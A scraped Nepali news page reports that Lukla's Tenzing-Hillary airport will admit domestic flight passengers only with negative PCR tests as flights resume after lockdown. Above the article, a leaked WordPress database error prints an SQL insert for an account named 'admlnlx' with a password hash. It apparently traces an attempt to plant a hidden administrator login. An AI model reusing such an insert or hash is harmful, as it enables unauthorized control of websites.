WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bs/4zxDabcIyQhSs.bmL7eFhFPsupW0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-28 20:01:17', '', 'admlnlx', 'admlnlx')
काठमाडौं । कोरोना (कोभिड १९) कहरको करिब ७ महिना लामो लकडाउन पछी सरकारले सोमबारबाट आन्तरिक उडान खुला गर्दैछ । पर्यटकीय सिजनमा सबैभन्दा व्यस्त हुने सोलुखुम्बुको खुम्बुपासाङल्यामु गाउँपालिका स्थित तेन्जिङ हिलारी विमानस्थल लुक्ला हो ।
तर, तेन्जिङ हिलारी बिमान स्थल उड्ने यात्रुले आफ्नो पीसीआर टेस्ट गरी नेगेटिभ हुनुपर्ने गाउँपालिकाले जनाएको छ ।
खुम्बु पासाङल्हामु गाउँपालिकाले सबै एयरलाइन्स कम्पनीलाई पत्र लेख्दै सबै यात्रुको पीसीआर टेस्ट रिजल्ट चेक जाँच गरी नेगेटिभ आए मात्र उडान अनुमति दिन पत्र लेखेको छ ।